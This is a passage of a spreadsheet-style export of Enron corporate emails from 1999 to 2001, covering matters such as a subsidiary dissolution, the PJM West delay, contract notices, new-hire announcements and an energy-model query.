Pham/Corp/Enron@ENRON, SAP Master Data@ENRON_x000D_
		 cc: Amy Jon/HOU/ECT@ECT, Neha Shah/Corp/Enron@ENRON_x000D_
		 Subject: Proposed Dissolution - Enron Administrative Services Corp. (Company _x000D_
#446)_x000D_
_x000D_
Enron Administrative Services Corp. is being considered for dissolution.  _x000D_
Please let me know by Wednesday, February 21, 2001, if there is any reason _x000D_
not to dissolve this corporation.  If I receive no responses, we will proceed _x000D_
with the dissolution._x000D_
Please distribute this memo to all interested parties within your group._x000D_
_x000D_
Teresa A. Callahan_x000D_
Corporate Secretary's Office_x000D_
EB4804    Ext. 58444</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 11:52:45 -0800 (PST)</t>
  </si>
  <si>
    <t>PJM West Implementation Delayed</t>
  </si>
  <si>
    <t>Message sent from the pjm-customer-info mailing list at pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
_x000D_
The implementation of incorporating PJM West into PJM will not occur on January_x000D_
1, 2002 as planned because the merger has not yet received final approval by_x000D_
FERC. FERC provisionally approved Allegheny Power joining the PJM RTO in July,_x000D_
2001. Much of the system integration coding, testing and training work has_x000D_
already been completed, and staff has been employed to operate the PJM West_x000D_
office and dispatch center in Greensburg, PA._x000D_
_x000D_
At its meeting on December 19, the FERC rejected a PJM West "cleanup" filing on_x000D_
procedural issues, while continuing to endorse the concept of PJM West, and_x000D_
suggested that they would act on PJM West in the near future. In order to allow_x000D_
Allegheny necessary lead time, the implementation date will be the first of the_x000D_
month at least 30 days following FERC approval. PJM will continue to move toward_x000D_
the implementation of required system changes in an orderly fashion._x000D_
_x000D_
Please DO NOT REPLY to this message. If you have a question for PJM Customer_x000D_
Relations and Training, please complete and submit this form:_x000D_
http://www.pjm.com/contact/questions.html_x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 15:37:36 -0800 (PST)</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 19:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vince.j.kaminski@enron.com', 'julie@lacima.co.uk'})</t>
  </si>
  <si>
    <t>Re: EPRM article</t>
  </si>
  <si>
    <t>Julie/Vince_x000D_
?_x000D_
I worked on both the last couple of nights and made quite  a few small _x000D_
"improvements"._x000D_
?_x000D_
Vince - if the 2nd article (EPRM_02_mr.doc) is OK with you  then that is _x000D_
ready._x000D_
?_x000D_
The 3rd article needs fig 1 updating still will hopefully  do that this w/e._x000D_
?_x000D_
Les._x000D_
?_x000D_
 - eprm_02_03.ZIP</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 12:07:45 -0800 (PST)</t>
  </si>
  <si>
    <t>ERCOT</t>
  </si>
  <si>
    <t>Christi,_x000D_
_x000D_
Can you check and see if we need a FERC license for ERCOT? I am thinking that we can avoid it and just qualify with the PUCT and ISO._x000D_
_x000D_
Please let me know,_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Doug</t>
  </si>
  <si>
    <t>Fri, 30 Jul 1999 03:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'justin.boyd@enron.com', 'timothy.hughes@cliffordchance.com'})</t>
  </si>
  <si>
    <t>Revised North American PA &amp; ETA</t>
  </si>
  <si>
    <t xml:space="preserve">Here are my revised versions - I look forward to your comments._x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>N-I-C-E Pitch!</t>
  </si>
  <si>
    <t xml:space="preserve">I was at the pre-seasoner opener at Enron Field last Friday night and saw you _x000D_
throw the first pitch.  It was a nice one - never a chance of it hitting the _x000D_
dirt!  -Sally </t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 09:57:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.mumm@enron.com', 'center.dl-portland@enron.com', 'andrea.woodland@enron.com', 'darren.cavanaugh@enron.com', 'james.bruce@enron.com', 'john.oh@enron.com', 'david.frost@enron.com', 'darin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Welcome new hire: Darin Presto</t>
  </si>
  <si>
    <t>We are pleased to announce a new addition to the Portland West Desk:_x000D_
_x000D_
Darin Presto has recently joined the Real Time Trading Group._x000D_
_x000D_
Prior to working at Enron, Darin was a Biology teacher in Richland, Washington. He is a graduate of Concordia University (Portland) &amp; Eastern Washington University, where he received Bachelors degrees in Biology &amp; Exercise Science (respectively). He also received a Master of Arts in Teaching degree at Concordia. _x000D_
_x000D_
Please join us in welcoming Darin to our Portland office!</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 08:54:51 -0800 (PST)</t>
  </si>
  <si>
    <t>Attention Body Shop Members -- UPDATE on Body Shop Closure</t>
  </si>
  <si>
    <t xml:space="preserve">The decision to close the Body Shop came after the December 15 payroll run, so you will incur a deduction on your December 15 paycheck.  However, Payroll will refund those charges on your December 31 paycheck.  _x000D_
_x000D_
As a reminder the Body Shop will be open from 8:00 a.m. - 5:00 p.m. today through Friday, December 14, to allow members to retrieve personal items from lockers.  _x000D_
_x000D_
Thank you.  </t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 05:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Rocky Mountain Elk Foundation Status</t>
  </si>
  <si>
    <t>Larry:_x000D_
_x000D_
Give me a call when you have a chance and we can talk about different avenues _x000D_
we can take._x000D_
_x000D_
Kimberly Nelson_x000D_
713/853-3580_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Shafer, John  _x000D_
Sent: Wednesday, June 20, 2001 8:59 AM_x000D_
To: Campbell, Larry_x000D_
Cc: Nelson, Kimberly; Taylor, Gina_x000D_
Subject: RE: Rocky Mountain Elk Foundation Status_x000D_
_x000D_
Larry,_x000D_
Call Kimberly or Gina and talk to them about how they would suggest doing _x000D_
this.  They are both great people to work with and have been so helpful on _x000D_
other initiatives.  I know they will have some ideas.  It may be that EBIZ _x000D_
could be used or some other internal company media.   John_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Campbell, Larry  _x000D_
Sent: Tuesday, June 19, 2001 4:25 PM_x000D_
To: Shafer, John_x000D_
Cc: Kendrick, William_x000D_
Subject: Rocky Mountain Elk Foundation Status_x000D_
_x000D_
John, I just spoke with Dan Walker, Vice President  of Development for the _x000D_
Rocky Mountain Elk Foundation about Enron's initiative for a corporation _x000D_
partnership.  After we had discussed our interest and desire and what _x000D_
opportunities are available with the Foundation for Enron, Dan stated that _x000D_
will be visiting with the Foundation's CEO next week and one of the issues to _x000D_
be discussed will be development of  an MOU or Agreement between Enron and _x000D_
the RMEF.  Looks like things are beginning to progress._x000D_
_x000D_
Im having quite a bit of interest from some of the Houston based Enron _x000D_
employees about how they can get involved.  Any suggestions on how I can _x000D_
"advertise" opportunities within the Corporation for employee involvement _x000D_
with the RMEF?</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 09:14:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: TW Station 1 Heat Recovery</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Millar, John  _x000D_
Sent:	Tuesday, August 21, 2001 4:31 PM_x000D_
To:	Schoolcraft, Darrell_x000D_
Subject:	TW Station 1 Heat Recovery_x000D_
_x000D_
Daryl,  I thought it may be more efficient to compose my question in an e-mail._x000D_
_x000D_
I am developing a project at this station in which the exhaust from the new LM 2500 gas turbine could be used to generate up to 15 megawatts of electricity.  After several weeks of engineering and financial analysis, I am now beginning to market the project to prospective counter-parties including local utilities and cooperatives. _x000D_
_x000D_
One issue that will certainly be discussed is the risk of the LM 2500 not producing enough exhaust to generate the contracted amounts of electricity.  This could occur because of either mechanical failure or loss of throughput in Transwestern's pipeline.  In the latter case, Transwestern could choose several alternatives to transport reduced volumes of gas to the CA border including reducing the horsepower in some or all stations uniformly or shutting down and bypassing some stations while others run at normal speed.  If I did this deal, naturally, I would want Station 1 to run as much as possible so I would have the exhaust needed to generate the electricity I've sold.  Otherwise I pay penalties._x000D_
_x000D_
My question to you is...  if volumes through TW were to decline, say 25% or so below design rate, would it be possible to keep Station 1 going at 100% and cut other stations back or does that just not make any sense?_x000D_
_x000D_
Come by when you're ready and we'll discuss._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John </t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.davis@enron.com', 'marilyn.colbert@enron.com', 'kevin.radous@enron.com', 'nidia.mendoza@enron.com', 'souad.mahmassani@enron.com', 'yolanda.cordova-gilbert@enron.com', 'william.bradford@enron.com', 'amber.ebow@enron.com', 'tanya.rohauer@enron.com', 'molly.harris@enron.com', 'mary.gosnell@enron.com', 'gordon.heaney@enron.com', 'connie.sutton@enron.com', 'rod.nelson@enron.com', 'russell.diamond@enron.com', 'wendi.lebrocq@enron.com', 'mary.solmonson@enron.com', 'brant.reves@enron.com', 'diane.ellstrom@enron.com', 'laurel.adams@enron.com', 'david.dupre@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'jefferson.sorenson@enron.com', 'jean.bell@enron.com', 'charlie.hoang@enron.com', 'dianne.seib@enron.com', 'mark.taylor@enron.com', 'carrie.southard@enron.com', 'harry.bucalo@enron.com', 'julie.meyers@enron.com', 'bruce.mills@enron.com', 'anthony.campos@enron.com', 'adnan.patel@enron.com', 'bill.hare@enron.com', 'sheetal.patel@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'john.suttle@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'pamela.sonnier@enron.com', 'lynn.shivers@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'sheri.thomas@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'karen.lambert@enron.com', 'leslie.reeves@enron.com', 'derek.bailey@enron.com', 'lisa.gillette@enron.com', 'jarrod.cyprow@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>McMurry Oil Company</t>
  </si>
  <si>
    <t>We have received the following executed Master Agreement:_x000D_
_x000D_
_x000D_
Type of Contract:  Industrial Master Agreement_x000D_
_x000D_
Effective Date:   December 7, 1999_x000D_
_x000D_
Enron Entity:   Enron North America Corp._x000D_
_x000D_
Counterparty:   McMurry Oil Company_x000D_
_x000D_
Transactions Covered:  Commodities, with the exception of weather, and pulp _x000D_
and paper</t>
  </si>
  <si>
    <t>Re: EI 330 A and SMI 128 Revised Availabilities effective 6/17/00_x000D_
 (SeaRobin P/L)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Ami Chokshi/Corp/Enron on 06/16/2000 _x000D_
08:40 AM ---------------------------_x000D_
_x000D_
_x000D_
"Steve Holmes" &lt;Steve.Holmes@dvn.com&gt; on 06/16/2000 08:31:22 AM_x000D_
To: &lt;Ami.Chokshi@enron.com&gt;, &lt;Christina.Sanchez@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: EI 330 A and SMI 128 Revised Availabilities effective 6/17/00 _x000D_
(SeaRobin P/L)_x000D_
_x000D_
_x000D_
Here is the change to Garden Banks 128 that was effective 6/15/00.  I'll send _x000D_
the documentation on the revisions that were made 6/14/00 (decrease due to _x000D_
the Sea Robin plant coming back online) this afternoon._x000D_
_x000D_
Thanks,_x000D_
Steve_x000D_
_x000D_
&gt;&gt;&gt; &lt;Christina.Sanchez@enron.com&gt; 06/16/00 08:18AM &gt;&gt;&gt;_x000D_
_x000D_
Thanks.  By the way, I never got any documentation for the GB128 change_x000D_
effective 6/15.  Could you send something over for my (and Ami's) records?_x000D_
_x000D_
_x000D_
 - GB128reveff061500.xls_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 08:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Salmon Energy Turbine Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Final version agreed to by April 11th._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 04/06/2001 03:22:15 PM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Salmon Energy Turbine Agreement_x000D_
_x000D_
Is that a completed contract by 4/11 or the draft out for review?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Friday, April 06, 2001 4:21 PM_x000D_
To: Shoemaker, Kent (GEAE)_x000D_
Subject: RE: Salmon Energy Turbine Agreement_x000D_
_x000D_
_x000D_
_x000D_
We are supposed to try to have the break out contract by April 11, and I_x000D_
think the consents and stuff that same week._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 04/06/2001 03:17:24_x000D_
PM_x000D_
_x000D_
To:   "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Salmon Energy Turbine Agreement_x000D_
_x000D_
What's your scheduling like on this one_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Friday, April 06, 2001 4:12 PM_x000D_
To: kent.shoemaker@ae.ge.com_x000D_
Subject: Salmon Energy Turbine Agreement_x000D_
_x000D_
_x000D_
Hi Kent,_x000D_
_x000D_
I can get a redline done for you if you want to tell me what it should be_x000D_
redlined against._x000D_
_x000D_
I don't know about getting rid of the requirement for the inhouse counsel_x000D_
opinion.  Maybe after you look at things we can discuss it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/06/2001 03:08_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;pthompson@akllp.com&gt; on 04/02/2001 04:56:21 PM_x000D_
_x000D_
To:   "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;_x000D_
cc:   "Pipitone, Paul" &lt;paulpipitone@akllp.com&gt;_x000D_
_x000D_
Subject:  Salmon Energy Turbine Agreement_x000D_
_x000D_
_x000D_
_x000D_
     Attached please find the latest Salmon Energy Turbine Agreement_x000D_
(second document below), as well as a blackline (first document below)_x000D_
showing changes made to the version circulated last Friday.  Pursuant to_x000D_
your instructions, the performance values in Article 10 are per the 24_x000D_
Unit master agreement.  In addition no changes have been made to the_x000D_
Maximum or Unit Liability Amounts or payment schedule. To complete the_x000D_
agreement, we will need to insert the date of execution and Exhibit H-2._x000D_
_x000D_
 &lt;&lt;Comparison of Versions 2 to 3 of Salmon Energy Agreement.DOC&gt;&gt;_x000D_
&lt;&lt;Salmon Energy Agreement - Version 3.DOC&gt;&gt;_x000D_
(See attached file: Comparison of Versions 2 to 3 of Salmon Energy_x000D_
Agreement.DOC)_x000D_
(See attached file: Salmon Energy Agreement - Version 3.DOC)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 May 2000 02:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joann.collins@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>STOI Overinjection for May 2nd</t>
  </si>
  <si>
    <t xml:space="preserve">Steve at TCO's Gas Control approved the 32,000 overinjection._x000D_
_x000D_
_x000D_
Total STOI Delivery for May 2nd is 80,000._x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Mar 2000 01:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Enron Online</t>
  </si>
  <si>
    <t>Debbie,_x000D_
_x000D_
Thanks for the heads up on this.  I've been trying to get David Minns for _x000D_
several days about various issues.  Keep me posted.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:38:56 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">im going to call ny and tell them you should really go up there now_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 11:37 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ok you are boring!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 11:37 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
nope_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 11:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i'm funny.  don't you think?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 11:34 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
jerk_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 11:31 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ya think?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Jaime:_x000D_
Here is a message that I received from our counsel.  Again, I and they are _x000D_
just focusing on the Enron Online issues and Sara is handling the issues _x000D_
relating to doing transactions offline between Enron Mexico and the Mexican _x000D_
counterparties.  I will suggest to our counsel that we have a call mid next _x000D_
week involving you, me and them.  What is your availability on Wednesday?  _x000D_
Alos, who from credit are you dealing with and are they aware that we _x000D_
probably will not be able to in a bankruptcy situation offset amounts owed _x000D_
with respect to the online and offline transactions?_x000D_
_x000D_
 _x000D_
_x000D_
Jeff:_x000D_
Are there any tax issues that we need to be concerned about regarding the _x000D_
online piece of this?_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/30/2000 11:00 AM -----_x000D_
_x000D_
	Carol St Clair_x000D_
	06/30/2000 08:05 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, David Forster/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: Update_x000D_
_x000D_
Mark and David:_x000D_
Here is the status of research our counsel in Mexico is doing re online _x000D_
issues._x000D_
Carol_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/30/2000 08:04 AM -----_x000D_
_x000D_
	"Pablo Perezalonso" &lt;pperezalonso@rhm.com.mx&gt;_x000D_
	06/29/2000 07:41 PM_x000D_
		 _x000D_
		 To: Carol.St.Clair@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re: Update_x000D_
_x000D_
_x000D_
Carol:_x000D_
_x000D_
We are working on the questionaire, but we have been delayed. We will have an _x000D_
initial draft by the middle of next week._x000D_
_x000D_
Regards_x000D_
_x000D_
&gt;&gt;&gt; "Carol St Clair" &lt;Carol.St.Clair@enron.com&gt; 06/29/00 04:41PM &gt;&gt;&gt;_x000D_
_x000D_
_x000D_
Pablo and Jose:_x000D_
Could one of you e-mail me with an update of how your review of the online_x000D_
issues and documents is going and when we may be able to visit about your _x000D_
views_x000D_
on these matters?  Thanks._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Henwood query</t>
  </si>
  <si>
    <t>Hi Karolina,_x000D_
_x000D_
Yes, it might be more productive to talk on the phone.  Given our time _x000D_
difference, why don't we plan on tomorrow (Friday) 8:00AM PDT, 4:00PM BDT?  _x000D_
My number in the states is 503-464-8430.  Give me your number, too, so that I _x000D_
can call back if I get hung up in a meeting or something._x000D_
_x000D_
The situation is complicated by the fact that the marginal cost is set by the _x000D_
capacity increment of a plant that is on the margin in a particular hour, but _x000D_
in constructing the stack, increments of a plant may be scattered throughout _x000D_
the stack, based on their respective incremental heat rates.  (This is why _x000D_
increment heat rates must be strictly increasing in this model.)  Results for _x000D_
the capacity increments, however, are not available as output; only each _x000D_
plant's aggregate values are reported._x000D_
_x000D_
I had to construct the stack for a particular hour to answer question about a _x000D_
Homer City, NY plant we were studying a few years ago.  Attached is the SQL _x000D_
query you can import into MS ACCESS to do the same thing for you (making _x000D_
appropriate modifications to the year, hour, etc.)  Unfortunately, no Henwood _x000D_
documentation on the output variables existed when I created this query, so I _x000D_
can not really tell you what they represent anymore.  An acquaintance of mine _x000D_
at Entergy and I were lobbying to get Henwood to provide some documentation, _x000D_
so it may be available now._x000D_
_x000D_
Let's talk and maybe we can help you out,_x000D_
Michael_x000D_
_x000D_
&gt;&gt;&gt; Karolina Potter/LON/ECT@ENRON 08/24/00 07:08AM &gt;&gt;&gt;_x000D_
Michael,_x000D_
_x000D_
I am an analyst in Paul Mead's Continental Power Trading group in London. I _x000D_
am currently working on the project, which requires the use of EMSS, and _x000D_
experience some difficulties interpreting the output results. Steven Leppard _x000D_
from our research group gave me your name as an expert in this system and _x000D_
consequently the person to contact in case of problems._x000D_
_x000D_
I have been running simulations for the Dutch market and was asked to provide _x000D_
the traders with some front-end screen graphs in order to interpret the _x000D_
numerical results. One of the graphs is to show an hourly generation stack _x000D_
and system's marginal cost, as we only run cost based scenarios. To sort each _x000D_
station's hourly generation I need its marginal cost. To my knowledge though, _x000D_
marginal cost is only generated for a systems marginal unit (TransArea _x000D_
Marginal Units query, Marg_cost unit). Therefore I was sorting the stations _x000D_
according to the cost which I calculated based on the outputs from Station _x000D_
Detail by Hour query. The calculation was as follows:_x000D_
_x000D_
For each hour, for each generating station:_x000D_
_x000D_
"marginal cost" [o/MWh] = (Generation_Cost [o000] * 1000)/Generation [MWh] - _x000D_
VOM_cost [o/MWh]_x000D_
_x000D_
This I thought would include fuel cost and start up costs. However, a _x000D_
marginal station which I get on the stack as a result of the above _x000D_
calculation is not a station given in Marginal Station field in TransArea _x000D_
Marginal Units query. I have also looked into TransArea_Data_Hr table and _x000D_
TransArea_Data table but non of the costs there match my results._x000D_
_x000D_
Do you happen to know what formula is used to determine Marg_cost and which _x000D_
outputs I should be using to obtain the right results?_x000D_
_x000D_
It might be easier if we could discuss this issue on the phone. In this case _x000D_
could you please send me your direct telephone number. I am struggling _x000D_
understanding what is going on and would appreciate your help very much._x000D_
_x000D_
Regards_x000D_
_x000D_
Karolina _x000D_
 - TEXT.htm_x000D_
 - stack generator sql.txt</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 13:41:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cynthia.biggs@travelpark.com'})</t>
  </si>
  <si>
    <t>RE: Car Reservation</t>
  </si>
  <si>
    <t>Hi Jeff. I just got in and I will set it up for you and email an itinerary_x000D_
to you._x000D_
thanks_x000D_
cynthia_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dasovich, Jeff [mailto:Jeff.Dasovich@ENRON.com]_x000D_
Sent: Monday, October 29, 2001 12:21 PM_x000D_
To: Cynthia Biggs_x000D_
Subject: Car Reservation_x000D_
_x000D_
_x000D_
Hi Cynthia:_x000D_
_x000D_
I'm not sure if I'm going about this correctly, but Joseph's out today,_x000D_
so I thought I'd give it a shot.  I need to rent a car tomorrow Tuesday,_x000D_
Oct. 30 (pick up at 7:30 AM and return it on Wed. Oct. 31 at 7:30 AM_x000D_
(want to rent from the Hertz outlet on Mason Street in SF, which is_x000D_
where I always rent).  Is this something that you folks generally_x000D_
arrange, or do I just do it?  Is there a corporate account # I'll need_x000D_
if I do it?  Really appreciate your help._x000D_
_x000D_
Best,_x000D_
Jeff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 _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 07:27:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'jim.schwieger@enron.com', 'a..martin@enron.com', 'james.ducote@enron.com', 'james.mckay@enron.com', 't..zivley@enron.com', 'barbara.gray@enron.com', 'edward.gottlob@enron.com'})</t>
  </si>
  <si>
    <t>URGENT RESPONSE REQUIRED</t>
  </si>
  <si>
    <t xml:space="preserve">	Per Anne Koehler's memo dated 5/29/01, this is a reminder that the Knowledge Certificate is due today, May 31st,  no later than 12:00 noon.  Please execute this certificate and return to Anne's attention at EB 3839._x000D_
	If you have any questions, please contact  Anne at  x33448 or Barbara at  x36832._x000D_
_x000D_
Thank You,_x000D_
Kim Bennick_x000D_
_x000D_
 	_x000D_
----- Forwarded by Kimberlee A Bennick/HOU/ECT on 05/31/2001 09:09 AM -----_x000D_
_x000D_
_x000D_
	Anne C Koehler@ENRON Sent by: Carolyn George@ENRON 05/29/2001 06:26 PM 	   To: Nick Cocavessis/Enron@EnronXGate, Wes Colwell/Enron@EnronXGate, James I Ducote/HOU/ECT@ECT, Edward D Gottlob/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, James McKay/HOU/ECT@ECT, Thomas A Martin/Enron@EnronXGate, Brian Redmond/Enron@EnronXGate, Steve HPL Schneider/HOU/ECT@ECT, Jim Schwieger/Enron@EnronXGate, Charles Thompson/HOU/EES@EES, Jill T Zivley/Enron@EnronXGate  cc: Anne C Koehler/HOU/ECT@ECT, (bcc: Kimberlee A Bennick/HOU/ECT)  Subject: URGENT RESPONSE REQUIRED	_x000D_
_x000D_
_x000D_
_x000D_
	Attached hereto is the certificate that must be signed by each of you in connection with the sale of Houston Pipe Line Company to AEP.  As outlined in my earlier e-mail message to each of you, this certificate is your confirmation that you have reviewed the Disclosure Schedules to the Purchase and Sale Agreement and that you have notified Brian Redmond in writing of any additions or corrections that should be made prior to the Closing.  The certificate also confirms that you have provided relevant portions of the Disclosure Schedules to the Key Employees listed on Schedule II and asked them to also notify Brian Redmond of any additions that are required._x000D_
_x000D_
	Please execute this certificate where indicated below and return it to Anne Koehler no later than Thursday, May 31, at 12:00 noon.  If you have any questions, please contact Anne Koehler at #33448 or Barbara Gray at #36832._x000D_
_x000D_
_x000D_
 				 _x000D_
_x000D_
_x000D_
Anne C. Koehler_x000D_
Sr. Counsel, ENA_x000D_
EB 3839_x000D_
713-853-3448</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 05:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hey girl!</t>
  </si>
  <si>
    <t>What's happening?  How's your day going so far?  Mine is pretty good so far, _x000D_
we'll see at 2:10 p.m. when the Nymex closes.   Are you doing rehearsal _x000D_
tonight?  I still need to get me a good black dress, I really liked your red _x000D_
dress.  I need something on that order .  See you later!!!!</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 11:25:36 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: &lt;&lt;Concur Expense Document&gt;&gt; - October Expenses</t>
  </si>
  <si>
    <t>please approve for me._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	enron_update@concureworkplace.com@ENRON  _x000D_
Sent:	Wednesday, November 21, 2001 11:44 AM_x000D_
To:	Neal, Scott_x000D_
Subject:	&lt;&lt;Concur Expense Document&gt;&gt; - October Expenses_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Scott E. Goodell_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: October Expenses_x000D_
Report Total: $216.84_x000D_
Amount Due Employee: $216.84_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2000 23:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rockford.meyer@enron.com'})</t>
  </si>
  <si>
    <t>Transcript of the Duke/Supreme Court oral arguments</t>
  </si>
  <si>
    <t xml:space="preserve">This is a transcript of the oral argument before the Florida Supreme Court, _x000D_
if you want to get a flavor of the issues and arguments.  There is not set _x000D_
timetable for a decision._x000D_
_x000D_
Rock_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rockford Meyer/FGT/Enron on 02/11/2000 _x000D_
07:20 AM ---------------------------_x000D_
_x000D_
_x000D_
Robert Cullen_x000D_
02/10/2000 02:18 PM_x000D_
To: Jack Boatman/FGT/Enron@ENRON, Robert Hayes/FGT/Enron@ENRON, Denis _x000D_
Tu/FGT/Enron@ENRON, Rockford Meyer/FGT/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Transcript of the Duke/Supreme Court oral arguments_x000D_
_x000D_
_x000D_
Lets add the file this time, sorry.  It's an html file but should load._x000D_
_x000D_
Bob_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>mavrix</t>
  </si>
  <si>
    <t xml:space="preserve">Who is the exact corporate parent of Mavrix?  I think I saw an email that _x000D_
said ETS, but I don't think ETS is a corporate entity.  Is it Enron Pipeline _x000D_
Company?  Please let Bob and me know.  Thanks.  df </t>
  </si>
  <si>
